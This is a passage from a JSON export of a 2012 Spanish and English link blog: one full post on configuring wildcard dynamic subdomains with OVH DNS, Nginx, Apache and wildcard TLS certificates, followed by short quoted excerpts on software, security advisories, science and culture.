TheLinuxFoundation | \u003ca href=\"https://www.youtube.com/watch?v=Unfx2qCj6Ao\"\u003eyoutube.com\u003c/a\u003e\u003c/p\u003e","title":"2012: What a Year for Linux"},{"content":"Lo que se pretende es conseguir una manera rápida y sencilla de poner sitios web online. Una vez configurado el servidor web y el servidor DNS, lo único que tendremos que hacer para tener accesible un nuevo sitio web será colocarlo en un directorio concreto del servidor y podremos acceder a él a través del subdominio con el nombre del directorio. Por ejemplo, si creamos la web web1, automáticamente será accesible desde web1.example.com.\nEn mi caso concreto, dado que el dominio que apuntará al servidor será un dominio dinámico (sub.ignaciocano.com), los sitios web serán accesibles a través de un subdominio de éste. Por ejemplo, web1.sub.ignaciocano.com.\nConfigurar el servidor DNS Se puede utilizar cualquier servidor DNS que permita comodines (wildcards) para los subdominios de un dominio. Podemos utilizar el servidor DNS de nuestro dominio principal, o un servidor DNS propio. No sé si debe quedar algún servicio gratuito de dominios dinámicos, ya que servicios como DynDNS o No-IP creo recordar que sólo permiten los comodines en su versión de pago. En mi caso, he configurado el servidor DNS de OVH.\nEn tres sencillos pasos lo tendremos todo listo.\nPrimero, creamos un nuevo dominio tipo DynHOST. Para ello, vamos a Inicio \u0026gt; Hosting \u0026gt; Dominios \u0026amp; DNS \u0026gt; Zona DNS \u0026gt; campo DynHOST:\nSubdominio: sub IP de destino: Ponemos la IP del servidor Dejamos marcada la casilla para crear un identificador DynHOST Tras validar el primer paso, vamos a crear el identificador DynHOST:\nIdentificador: ignaciocano-identificadordeldominio Subdominio: sub.ignaciocano.com Contraseña: *************** Validamos y ya sólo quedará un último paso. Para que el este DynHOST permita subdominios, deberemos crear un registro CNAME. Vamos a Inicio \u0026gt; Hosting \u0026gt; Dominios \u0026amp; DNS \u0026gt; Zona DNS \u0026gt; campo CNAME:\nSubdominio: *.sub.ignaciocano.com Destino: sub.ignaciocano.com Validamos y listo.\nConfigurar el servidor web Todos los proyectos estarán ubicados a partir de un directorio común: /home/projects/subdomains. Lo que tenemos que hacer es que el servidor utilice el prefijo del dominio para utilizar la raíz del sitio correcta.\nNginx Configurar Nginx para que cualquier subdominio apunte a un directorio concreto es sencillo. Creamos un fichero de configuración para el dominio /etc/nginx/sites-available/sub.ignaciocano.com:\nserver { listen 80; server_name sub.ignaciocano.com ~^([^.]+)\\.sub\\.ignaciocano\\.com ; access_log /var/log/nginx/access.sub.ignaciocano.com.log; if ($host ~* ^([^.]+)\\.sub\\.ignaciocano\\.com$) { set $subdomain $1; } root /home/projects/subdomains/$subdomain/; } Sólo resta activar el sitio y reiniciar el servidor.\nApache Hacer lo propio en Apache es también sencillo. Podemos utilizar mod_rewrite:\nServerName sub.ignaciocano.com ServerAlias *.sub.ignaciocano.com RewriteEngine On RewriteCond %{HTTP_HOST} ^([^\\.]+)\\.sub\\.ignaciocano\\.com RewriteCond /home/projects/subdomains/%1 -d RewriteRule ^(.*) /%1/$1 [L] O bien vhost_alias, el cual lo simplifica aún más:\nServerName sub.ignaciocano.com ServerAlias *.sub.ignaciocano.com VirtualDocumentRoot /home/projects/subdomains/%1 Actualizado el 14 de febrero de 2015 Si queremos que las conexiones a estos subdominios sean seguras, una opción es crear un certificado con wildcard pero en lugar de hacerlo para el dominio principal, lo debemos hacer para el primer subdominio. En este caso, al crear la petición de firmado, en el campo Common Name deberemos poner *.sub.ignaciocano.com.\nHay que tener en cuenta que un certificado con wildcard para el dominio de primer nivel (*.ignaciocano.com), no se puede utilizar para estos subdominios de un subdominio, o de lo contrario el navegador nos avisará de que el dominio no coincide con el del certificado:\nMatching is performed using the matching rules specified by [RFC2459]. If more than one identity of a given type is present in the certificate (e.g., more than one dNSName name, a match in any one of the set is considered acceptable.) Names may contain the wildcard character \\* which is considered to match any single domain name component or component fragment. E.g., \\*.a.com matches foo.a.com but not bar.foo.a.com. f\\*.com matches foo.com but not bar.com. Por último, no estaría demás forzar el uso de HTTPS para estos subdominios:\nServerName sub.ignaciocano.com ServerAlias *.sub.ignaciocano.com RewriteEngine on ReWriteCond %{SERVER_PORT} !^443$ RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [NC,R,L] Referencias » Redirect of wildcard subdomain to subfolder » Wildcard subdomain directory names » HTTP over TLS\n","permalink":"http://karpoke.ignaciocano.com/2012/12/15/subdominios-dinamicos-en-un-alojamiento-con-dominio-dinamico-en-ovh/","summary":"\u003cp\u003eLo que se pretende es conseguir una manera rápida y sencilla de poner\nsitios web \u003cem\u003eonline\u003c/em\u003e. Una vez configurado el servidor web y el servidor\nDNS, lo único que tendremos que hacer para tener accesible un nuevo\nsitio web será colocarlo en un directorio concreto del servidor y\npodremos acceder a él a través del subdominio con el nombre del\ndirectorio. Por ejemplo, si creamos la web \u003ccode\u003eweb1\u003c/code\u003e, automáticamente será\naccesible desde \u003ccode\u003eweb1.example.com\u003c/code\u003e.\u003c/p\u003e","title":"Subdominios dinámicos en un alojamiento con dominio dinámico en OVH"},{"content":" A continuación os pongo una serie de páginas webs que considero imprescindibles en caso de tener cualquier tipo de duda. Se incluyen tanto páginas en castellano como en inglés, y junto a la página una pequeña descripción de lo que podéis encontrar en ella. Espero que os resulte útil.\n» Alber | eingleses.com\n","permalink":"http://karpoke.ignaciocano.com/2012/12/12/lista-de-paginas-recomendadas-para-aprender-ingles/","summary":"\u003cblockquote\u003e\n\u003cp\u003eA continuación os pongo una serie de páginas webs que considero\nimprescindibles en caso de tener cualquier tipo de duda. Se incluyen\ntanto páginas en castellano como en inglés, y junto a la página una\npequeña descripción de lo que podéis encontrar en ella. Espero que os\nresulte útil.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Alber | \u003ca href=\"http://eingleses.com/2012/11/03/lista-de-paginas-recomendadas-para-aprender-ingles/\"\u003eeingleses.com\u003c/a\u003e\u003c/p\u003e","title":"Lista de páginas recomendadas para aprender inglés"},{"content":" Tiene veinticinco años y es, posiblemente, la `abadía’ más joven de las que pueblan el territorio español aunque su ubicación no es exacta: vive en todos y cada uno de los microordenadores de 8 bits que un día la alojaron en sus monitores.\nLa Abadía del Crimen cumple un cuarto siglo y lo hace como uno de los referentes máximos del videojuego español y convertida en un objeto de culto tanto para aquellos que pudieron catarla en su día como para aquellos que la han descubierto con unos años de retraso.\n» Jaume Esteve | elmundo.es\n","permalink":"http://karpoke.ignaciocano.com/2012/12/12/una-abadia-con-muros-de-plata/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTiene veinticinco años y es, posiblemente, la `abadía’ más joven de\nlas que pueblan el territorio español aunque su ubicación no es\nexacta: vive en todos y cada uno de los microordenadores de 8 bits que\nun día la alojaron en sus monitores.\u003c/p\u003e\n\u003cp\u003eLa Abadía del Crimen cumple un cuarto siglo y lo hace como uno de los\nreferentes máximos del videojuego español y convertida en un objeto de\nculto tanto para aquellos que pudieron catarla en su día como para\naquellos que la han descubierto con unos años de retraso.\u003c/p\u003e","title":"Una abadía con muros de plata"},{"content":" Good tools are invaluable in figuring out where problems lie, and can also help to prevent problems from occurring in the first place, or just help you to be more efficient in general. Command line tools are particularly useful because they lend themselves well to automation and scripting, where they can be combined and reused in all sorts of different ways. Here we cover six particularly powerful and versatile tools which can help make your life a little bit easier.\n» Ben Dowling | smashingmagazine.com\n","permalink":"http://karpoke.ignaciocano.com/2012/11/03/powerful-command-line-tools-for-developers/","summary":"\u003cblockquote\u003e\n\u003cp\u003eGood tools are invaluable in figuring out where problems lie, and can\nalso help to prevent problems from occurring in the first place, or\njust help you to be more efficient in general. Command line tools are\nparticularly useful because they lend themselves well to automation\nand scripting, where they can be combined and reused in all sorts of\ndifferent ways. Here we cover six particularly powerful and versatile\ntools which can help make your life a little bit easier.\u003c/p\u003e","title":"Powerful Command Line Tools For Developers"},{"content":" This is one incredible list of films/movies. If Peter Weyland wanted David to learn about cinema while the crew of Prometheus was still in hyper sleep, he’d probably have him go down the IMDB Top 250. This list does change infrequently, and I began the project over a month prior to November 1, 2012, so attention to my haters\u0026hellip;Yes\u0026hellip;I KNOW some of these movies are not on the top 250. 53 Titles to be exact (as of 11/1/12). However, none of my haters can tell me that any of these 303 titles do not exist on IMDB.\n» Jonathan Keogh | youtube.com\n","permalink":"http://karpoke.ignaciocano.com/2012/11/03/imdb-top-250-in-2-12-minutes/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis is one incredible list of films/movies. If Peter Weyland wanted\nDavid to learn about cinema while the crew of Prometheus was still in\nhyper sleep, he’d probably have him go down the IMDB Top 250. This\nlist does change infrequently, and I began the project over a month\nprior to November 1, 2012, so attention to my haters\u0026hellip;Yes\u0026hellip;I KNOW\nsome of these movies are not on the top 250. 53 Titles to be exact\n(as of 11/1/12). However, none of my haters can tell me that any of\nthese 303 titles do not exist on IMDB.\u003c/p\u003e","title":"IMDB Top 250 in 2 1/2 Minutes"},{"content":" La sonda espacial Voyager ha cautivado al mundo con su proeza en los confines del Sistema Solar, pero su lanzamiento en 1977 sólo fue posible gracias a las ideas matemáticas y la persistencia de un estudiante de doctorado que descubrió cómo catapultar sondas al espacio.\n» Christopher Riley y Dallas Campbell | bbc.co.uk\n","permalink":"http://karpoke.ignaciocano.com/2012/10/30/la-idea-matematica-que-hizo-volar-al-voyager/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLa sonda espacial Voyager ha cautivado al mundo con su proeza en los\nconfines del Sistema Solar, pero su lanzamiento en 1977 sólo fue\nposible gracias a las ideas matemáticas y la persistencia de un\nestudiante de doctorado que descubrió cómo catapultar sondas al\nespacio.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Christopher Riley y Dallas Campbell | \u003ca href=\"http://www.bbc.co.uk/mundo/noticias/2012/10/121024_ciencia_matematicas_voyager_np.shtml\"\u003ebbc.co.uk\u003c/a\u003e\u003c/p\u003e","title":"La idea matemática que hizo volar al Voyager"},{"content":" ¿Porqué es que fotógrafos cargados con los artefactos más extraordinarios, que inclusive usan Internet para conseguir las coordenadas exactas de G.P.S donde Jack o Ansel sacaban sus fotos, llegando hasta esas ubicaciones geográficas con la imagen en la mano para poder sacar una copia igual (ilegal por el Derecho Registral de los EE.UU. y por el sentido común), consiguen algo que puede parecer similar, pero que carece de todo el impacto y la emoción del original que creyeron copiar?\n» Ken Rockwell | kenrockwell.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/30/por-que-tu-camara-no-importa/","summary":"\u003cblockquote\u003e\n\u003cp\u003e¿Porqué es que fotógrafos cargados con los artefactos más\nextraordinarios, que inclusive usan Internet para conseguir las\ncoordenadas exactas de G.P.S donde Jack o Ansel sacaban sus fotos,\nllegando hasta esas ubicaciones geográficas con la imagen en la mano\npara poder sacar una copia igual (ilegal por el Derecho Registral de\nlos EE.UU. y por el sentido común), consiguen algo que puede parecer\nsimilar, pero que carece de todo el impacto y la emoción del original\nque creyeron copiar?\u003c/p\u003e","title":"Por Que Tu Cámara No Importa"},{"content":" En este artículo vamos a ver cómo calcular la transformada de Fourier discreta (o DFT) de una señal en Python utilizando la transformada rápida de Fourier (o FFT) implementada en SciPy. El análisis de Fourier es la herramienta fundamental en procesamiento de señales y resulta útil en otras áreas como en la resolución de ecuaciones diferenciales o en el tratamiento de imágenes.\n» Juanlu001 | pybonacci.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/29/transformada-de-fourier-discreta-en-python-con-scipy/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEn este artículo vamos a ver cómo calcular la transformada de Fourier\ndiscreta (o DFT) de una señal en Python utilizando la transformada\nrápida de Fourier (o FFT) implementada en SciPy. El análisis de\nFourier es la herramienta fundamental en procesamiento de señales y\nresulta útil en otras áreas como en la resolución de ecuaciones\ndiferenciales o en el tratamiento de imágenes.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Juanlu001 | \u003ca href=\"https://pybonacci.wordpress.com/2012/09/29/transformada-de-fourier-discreta-en-python-con-scipy/\"\u003epybonacci.wordpress.com\u003c/a\u003e\u003c/p\u003e","title":"Transformada de Fourier discreta en Python con SciPy"},{"content":" Testers are often thought of as people who find bugs, but have you ever considered how testers actually approach testing? Do you ever wonder what testers actually do, and how they can add value to a typical technology project?\nI’d like to take you through the thought process of testers and discuss the types of things they consider when testing a mobile app. The intention here is to highlight their thought processes and to show the coverage and depth that testers often go to.\n» Rosie Sherry | smashingmagazine.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/28/a-field-guide-to-mobile-app-testing/","summary":"\u003cblockquote\u003e\n\u003cp\u003eTesters are often thought of as people who find bugs, but have you\never considered how testers actually approach testing? Do you ever\nwonder what testers actually do, and how they can add value to a\ntypical technology project?\u003c/p\u003e\n\u003cp\u003eI’d like to take you through the thought process of testers and\ndiscuss the types of things they consider when testing a mobile app.\nThe intention here is to highlight their thought processes and to show\nthe coverage and depth that testers often go to.\u003c/p\u003e","title":"A Field Guide To Mobile App Testing"},{"content":" This specification defines a JavaScript interface that provides the current time in sub-millisecond resolution and such that it is not subject to system clock skew or adjustments.\n» Jatinder Mann | w3.org\n","permalink":"http://karpoke.ignaciocano.com/2012/10/28/high-resolution-time/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis specification defines a JavaScript interface that provides the\ncurrent time in sub-millisecond resolution and such that it is not\nsubject to system clock skew or adjustments.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Jatinder Mann | \u003ca href=\"http://www.w3.org/TR/2012/PR-hr-time-20121023/\"\u003ew3.org\u003c/a\u003e\u003c/p\u003e","title":"High Resolution Time"},{"content":" Django, framework de desarrollo web basado en Python ha actualizado las ramas 1.3 y 1.4 para dar solución a una vulnerabilidad que podría, mediante técnicas de envenenamiento de cabeceras (”Header poisoning”), redireccionar a un usuario a un sitio malicioso o incluso el robo de credenciales.\nPara realizar algunas operaciones, Django extrae el nombre del dominio de la cabecera ”Host” enviada. La vulnerabilidad (CVE-2012-4520) reside en el parser del método django.http.HttpRequest.get_host(), que extrae esta cabecera ”Host” incorrectamente.\n» Antonio Sánchez | unaaldia.hispasec.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/28/envenenamiento-de-cabeceras-en-django-1-3-y-1-4/","summary":"\u003cblockquote\u003e\n\u003cp\u003eDjango, framework de desarrollo web basado en Python ha actualizado\nlas ramas 1.3 y 1.4 para dar solución a una vulnerabilidad que podría,\nmediante técnicas de envenenamiento de cabeceras (”Header poisoning”),\nredireccionar a un usuario a un sitio malicioso o incluso el robo de\ncredenciales.\u003c/p\u003e\n\u003cp\u003ePara realizar algunas operaciones, Django extrae el nombre del dominio\nde la cabecera ”Host” enviada. La vulnerabilidad (CVE-2012-4520)\nreside en el parser del método django.http.HttpRequest.get_host(),\nque extrae esta cabecera ”Host” incorrectamente.\u003c/p\u003e","title":"Envenenamiento de cabeceras en Django 1.3 y 1.4"},{"content":" When I started my on-call shifts, we had pretty little in the way of automation for day-to-day issues. Tasks like SSH’ing into our cluster, starting a Rails console, or doing a deep search through our gigantic mail directories, were either shelved away in someone’s bashrc, history log, or just ingrained into someone’s memory. This pain was also felt by a few other of my fellow programmers, and we started cobbling together a Git repo simply named ”37s shell scripts”.\nThis repo started very innocently: a little Ruby script named console that mapped a product name (basecamp) to a server name inside of our cluster (jobs-03), SSH’d in, and then ran a production Rails console. Several more bash and Ruby scripts started to trickle in as we started to share more of our personal code that we used when on-call. Eventually Sam laid down a foundation of bash scripts and directories borrowed from rbenv, and dubbed it ”37”.\n» Nick | 37signals.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/28/automating-with-convention-introducing-sub/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWhen I started my on-call shifts, we had pretty little in the way of\nautomation for day-to-day issues. Tasks like SSH’ing into our cluster,\nstarting a Rails console, or doing a deep search through our gigantic\nmail directories, were either shelved away in someone’s bashrc,\nhistory log, or just ingrained into someone’s memory. This pain was\nalso felt by a few other of my fellow programmers, and we started\ncobbling together a Git repo simply named ”37s shell scripts”.\u003c/p\u003e","title":"Automating with convention: Introducing sub"},{"content":" Academic researchers have improved wireless bandwidth by an order of magnitude”not by adding base stations, tapping more spectrum, or cranking up transmitter wattage, but by using algebra to eliminate the network-clogging task of resending dropped packets of data.\nBy providing new ways for mobile devices to solve for missing data, the technology not only eliminates this wasteful process but also can seamlessly weave data streams from Wi-Fi and LTE”a leap forward from other approaches that toggle back and forth. ”Any IP network will benefit from this technology,” says Sheau Ng, vice president for research and development at NBC Universal.\n» David Talbot | technologyreview.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/28/a-dash-of-algebra-on-wireless-networks-promises-to-boost-bandwidth-tenfold-without-new-infrastructure/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAcademic researchers have improved wireless bandwidth by an order of\nmagnitude”not by adding base stations, tapping more spectrum, or\ncranking up transmitter wattage, but by using algebra to eliminate the\nnetwork-clogging task of resending dropped packets of data.\u003c/p\u003e\n\u003cp\u003eBy providing new ways for mobile devices to solve for missing data,\nthe technology not only eliminates this wasteful process but also can\nseamlessly weave data streams from Wi-Fi and LTE”a leap forward from\nother approaches that toggle back and forth. ”Any IP network will\nbenefit from this technology,” says Sheau Ng, vice president for\nresearch and development at NBC Universal.\u003c/p\u003e","title":"A dash of algebra on wireless networks promises to boost bandwidth tenfold, without new infrastructure"},{"content":" Linux kernel developer Theodore ”Ted” Ts’o has released a series of patches for what he has called ”a Lance Armstrong bug” in the kernel, meaning behaviour that does not trip up tests but nevertheless makes the kernel work differently than intended. A user had reported a problem that caused data loss; the kernel developers quickly narrowed this down to a fault in the ext4 implementation that was introduced with the release of Linux 3.6.2 just over a week ago. Apparently, the data corruption bug was hard to track down as it only manifests itself if a system is rebooted twice in a relatively short period of time.\n» h-online.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/26/stable-linux-kernel-hit-by-ext4-data-corruption-bug/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLinux kernel developer Theodore ”Ted” Ts’o has released a series of\npatches for what he has called ”a Lance Armstrong bug” in the kernel,\nmeaning behaviour that does not trip up tests but nevertheless makes\nthe kernel work differently than intended. A user had reported a\nproblem that caused data loss; the kernel developers quickly narrowed\nthis down to a fault in the ext4 implementation that was introduced\nwith the release of Linux 3.6.2 just over a week ago. Apparently, the\ndata corruption bug was hard to track down as it only manifests itself\nif a system is rebooted twice in a relatively short period of time.\u003c/p\u003e","title":"Stable Linux kernel hit by ext4 data corruption bug"},{"content":" Cuando observamos el mundo físico que nos rodea, nos maravillamos de su extrema variedad y complejidad. Al examinar el mundo vivo no deja de sorprendernos la riqueza de animales y plantas que encontramos por doquier. Sería iluso pretender leer los libros que se han escrito en la historia. La música ofrece una enorme repertorio de temas que escuchar. Y el mundo digital sorprende por la desbordante cantidad de contenidos que nos presenta. Pero todos estos complejos mundos tienen algo en común: están compuestos por una pequeña cantidadde elementos combinados en gigantescos números.\n» Antonio Orbe | alt1040.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/20/pocos-elementos-forman-sistemas-complejos-en-el-mundo-fisico-biologico-o-digital/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCuando observamos el mundo físico que nos rodea, nos maravillamos de\nsu \u003cem\u003eextrema variedad\u003c/em\u003e y complejidad. Al examinar el mundo vivo no deja\nde sorprendernos la riqueza de animales y plantas que encontramos por\ndoquier. Sería iluso pretender leer los libros que se han escrito en\nla historia. La música ofrece una enorme repertorio de temas que\nescuchar. Y el mundo digital sorprende por la desbordante cantidad de\ncontenidos que nos presenta. Pero todos estos complejos mundos tienen\nalgo en común: están compuestos por una \u003cem\u003epequeña cantidadde elementos\ncombinados en gigantescos números\u003c/em\u003e.\u003c/p\u003e","title":"Pocos elementos forman sistemas complejos en el mundo físico, biológico o digital"},{"content":" This graphic chronicles the history of feature films from the origins in the 1910s until the present day. More than 2000 of the most important feature-length films are mapped into 20 genres spanning 100 years. Films selected to be included have: won important awards such as the best picture Academy Award; achieved critical acclaim according to recognized film critics; are considered to be key genre films by experts; and/or attained box office success.\nThe History of Film was created by Larry Gormley, an award winning designer.\n» historyshots.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/15/the-history-of-film/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis graphic chronicles the history of feature films from the origins\nin the 1910s until the present day. More than 2000 of the most\nimportant feature-length films are mapped into 20 genres spanning 100\nyears. Films selected to be included have: won important awards such\nas the best picture Academy Award; achieved critical acclaim according\nto recognized film critics; are considered to be key genre films by\nexperts; and/or attained box office success.\u003c/p\u003e","title":"The History of Film"},{"content":" Supongo que todos estáis al tanto de la hazaña de Felix Baumgartner, el hombre que ha saltado desde una altura de más de 120000 pies desde un globo, convirtiéndose en el hombre que más alto ha saltado y el que ha alcanzado la mayor velocidad sin ayuda mecánica como parte de la misión Red Bull Stratos.\nEn Pybonacci somos tan frikis, que vamos a visualizar el salto supersónico de Baumgartner como mejor se nos da: con Python ;)\nNota: Esto es un artículo recreativo que he escrito en un par de horas y he hecho unas cuantas suposiciones que no tienen porqué coincidir con la realidad. Tómese esto en cuenta a la hora de valorar los resultados.\n» Juanlu001 | pybonacci.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/15/el-salto-de-felix-baumgartner-en-python/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSupongo que todos estáis al tanto de la hazaña de Felix Baumgartner,\nel hombre que ha saltado desde una altura de más de 120000 pies desde\nun globo, convirtiéndose en el hombre que más alto ha saltado y el que\nha alcanzado la mayor velocidad sin ayuda mecánica como parte de la\nmisión Red Bull Stratos.\u003c/p\u003e\n\u003cp\u003eEn Pybonacci somos tan frikis, que vamos a visualizar el salto\nsupersónico de Baumgartner como mejor se nos da: con Python ;)\u003c/p\u003e","title":"El salto de Felix Baumgartner en Python"},{"content":" CSS was meant to style academic documents and simple sites (eg. wiki, blogs) where the cascade and descendant selectors makes a lot of sense. Unfortunately many sites we build nowadays are way more complex than that, and what used to work on simple projects doesn’t scale very well. We need to find smarter ways to code CSS to avoid the common issues and re-think the way we do our work. We should learn from the experience of other devs working in different domains, and apply into our own domain. Things like separation of concerns, modularity, encapsulation, DRY can (and should) be applied to large scale CSS projects as well. The main problem is that most people who are good at CSS doesn’t necessarily have a Computer Science background, most of them started as designers and learned CSS by themselves (that was my case¦). That’s the main reason why I’m writing this post.\nI won’t get into too much details/examples but will try to explain briefly each concept. Some of the SOLID principles are open to multiple interpretations on the CSS context - since we are shoehorning the concepts - that’s one of the reasons why I decided to not give detailed examples. I also think we should understand the idea and not be tied to a specific implementation.\n» Miller Medeiros | millermedeiros.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/09/solid-css/","summary":"\u003cblockquote\u003e\n\u003cp\u003eCSS was meant to style academic documents and simple sites (eg. wiki,\nblogs) where the cascade and descendant selectors makes a lot of\nsense. Unfortunately many sites we build nowadays are way more complex\nthan that, and what used to work on simple projects doesn’t scale very\nwell. We need to find smarter ways to code CSS to avoid the common\nissues and re-think the way we do our work. We should learn from the\nexperience of other devs working in different domains, and apply into\nour own domain. Things like separation of concerns, modularity,\nencapsulation, DRY can (and should) be applied to large scale CSS\nprojects as well. The main problem is that most people who are good at\nCSS doesn’t necessarily have a Computer Science background, most of\nthem started as designers and learned CSS by themselves (that was my\ncase¦). That’s the main reason why I’m writing this post.\u003c/p\u003e","title":"SOLID CSS"},{"content":" Apple tomó muchas decisiones técnicas con el objetivo de mejorar la ”experiencia de usuario”, pero por sí mismas serían inútiles -o más perjudiciales- si no van acompañadas de medidas de control estrictas. Es fundamental el papel de los controles de las aplicaciones en el App Store (¡ojo! no los justifico). Independientemente de otras consideraciones políticas, dado su simplicidad y soluciones ad hoc, el iOS sería muy fácil de ”abusar” por los desarrolladores y aplicaciones.\nPor el contrario, Android es una plataforma abierta que puede user cualquier fabricante, que permite la instalación de cualquier aplicación. El control de aplicaciones del Market por parte de Google es prácticamente inexistente. Esto hace que no valgan soluciones ad hoc, obliga a implementar en el sistema operativo medidas de seguridad y control ”canónicas”, en el sentido que mantenga las condiciones fundamentales de todo sistema operativo de propósito general: eficiencia, equidad (fairness) y seguridad.\n» Ricardo Galli | gallir.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/09/android-ios-tiempos-de-respuestas-y-por-que-nada-es-gratis-en-sistemas-informaticos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eApple tomó muchas decisiones técnicas con el objetivo de mejorar la\n”experiencia de usuario”, pero por sí mismas serían inútiles -o más\nperjudiciales- si no van acompañadas de medidas de control estrictas.\nEs fundamental el papel de los controles de las aplicaciones en el App\nStore (¡ojo! no los justifico). Independientemente de otras\nconsideraciones políticas, dado su simplicidad y soluciones ad hoc, el\niOS sería muy fácil de ”abusar” por los desarrolladores y\naplicaciones.\u003c/p\u003e","title":"Android, iOS, tiempos de respuestas y por qué nada es gratis en sistemas informáticos"},{"content":" Working with redirections in bash is really easy once you realize that it’s all about manipulating file descriptors. When bash starts it opens the three standard file descriptors: stdin (file descriptor 0), stdout (file descriptor 1), and stderr (file descriptor 2). You can open more file descriptors (such as 3, 4, 5, \u0026hellip;), and you can close them. You can also copy file descriptors. And you can write to them and read from them.\nFile descriptors always point to some file (unless they’re closed). Usually when bash starts all three file descriptors, stdin, stdout, and stderr, point to your terminal. The input is read from what you type in the terminal and both outputs are sent to the terminal.\n» Peteris Krumins | catonmat.net\n","permalink":"http://karpoke.ignaciocano.com/2012/10/09/bash-one-liners-explained-part-iii-all-about-redirections/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWorking with redirections in bash is really easy once you realize that\nit’s all about manipulating file descriptors. When bash starts it\nopens the three standard file descriptors: stdin (file descriptor 0),\nstdout (file descriptor 1), and stderr (file descriptor 2). You can\nopen more file descriptors (such as 3, 4, 5, \u0026hellip;), and you can close\nthem. You can also copy file descriptors. And you can write to them\nand read from them.\u003c/p\u003e","title":"Bash One-Liners Explained, Part III: All about redirections"},{"content":" Have you ever tried to add a footnote to a table inside the tabular environment? Even though the index is printed, the search for the actual footnote will be in vain.\n» Tom | texblog.org\n","permalink":"http://karpoke.ignaciocano.com/2012/10/09/using-footnote-in-tables/","summary":"\u003cblockquote\u003e\n\u003cp\u003eHave you ever tried to add a footnote to a table inside the tabular\nenvironment? Even though the index is printed, the search for the\nactual footnote will be in vain.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Tom | \u003ca href=\"http://texblog.org/2012/02/03/using-footnote-in-a-table/\"\u003etexblog.org\u003c/a\u003e\u003c/p\u003e","title":"Using footnote in tables"},{"content":" This course details the exploitation of SQL injection in a PHP based website and how an attacker can use it to gain access to the administration pages. Then, using this access, the attacker will be able to gain code execution on the server. The attack is divided into 3 steps:\nFingerprinting: to gather information on the web application and technologies in use. Detection and exploitation of SQL injection: in this part, you will learn how SQL injections work and how to exploit them in order to retrieve information. Access to the administration pages and code execution: the last step in which you will access the operating system and run commands. » pentesterlab.com\n","permalink":"http://karpoke.ignaciocano.com/2012/10/08/from-sql-injection-to-shell/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThis course details the exploitation of SQL injection in a PHP based\nwebsite and how an attacker can use it to gain access to the\nadministration pages. Then, using this access, the attacker will be\nable to gain code execution on the server.\nThe attack is divided into 3 steps:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eFingerprinting: to gather information on the web application and\ntechnologies in use.\u003c/li\u003e\n\u003cli\u003eDetection and exploitation of SQL injection: in this part, you\nwill learn how SQL injections work and how to exploit them in\norder to retrieve information.\u003c/li\u003e\n\u003cli\u003eAccess to the administration pages and code execution: the last\nstep in which you will access the operating system and run\ncommands.\u003c/li\u003e\n\u003c/ol\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» \u003ca href=\"https://www.pentesterlab.com/from_sqli_to_shell.html\"\u003epentesterlab.com\u003c/a\u003e\u003c/p\u003e","title":"From SQL injection to shell"},{"content":" NAND flash memory-based storage devices, such as SSD, eMMC, and SD cards, have been widely being used for ranging from mobile to server systems. Since they are known to have different characteristics from the conventional rotational disks, a file system, an upper layer to the storage device, should adapt to the changes from the sketch.\nF2FS is a new file system carefully designed for the NAND flash memory-based storage devices. We chose a log structure file system approach, but we tried to adapt it to the new form of storage. Also we remedy some known issues of the very old log structured file system, such as snowball effect of wandering tree and high cleaning overhead.\nBecause a NAND-based storage device shows different characteristics according to its internal geometry or flash memory management scheme aka FTL, we add various parameters not only for configuring on-disk layout, but also for selecting allocation and cleaning algorithms.\n» Jaegeuk Kim | lkml.org\n","permalink":"http://karpoke.ignaciocano.com/2012/10/06/f2fs-introduce-flash-friendly-file-system/","summary":"\u003cblockquote\u003e\n\u003cp\u003eNAND flash memory-based storage devices, such as SSD, eMMC, and SD\ncards, have\nbeen widely being used for ranging from mobile to server systems.\nSince they are\nknown to have different characteristics from the conventional\nrotational disks,\na file system, an upper layer to the storage device, should adapt to\nthe changes\nfrom the sketch.\u003c/p\u003e\n\u003cp\u003eF2FS is a new file system carefully designed for the NAND flash\nmemory-based storage\ndevices. We chose a log structure file system approach, but we tried\nto adapt it\nto the new form of storage. Also we remedy some known issues of the\nvery old log\nstructured file system, such as snowball effect of wandering tree and\nhigh cleaning\noverhead.\u003c/p\u003e","title":"f2fs: introduce flash-friendly file system"},{"content":" El tiempo\u0026hellip; ese bien tan preciado para muchos, tan desperdiciado por la mayoría\u0026hellip; Eso que los relojes nos ayudan a medir o controlar a diario.\nHablemos de relojes. Los hay de muchísimos tipos: de muñeca, de pared, analógicos, digitales, con números arábigos, con números romanos, o hasta sin números. Y, evidentemente, los hay con motivos friki-matemáticos. Y de esos son los que vamos a ver a continuación, de relojes matemáticos.\n» ^DiAmOnD^ | 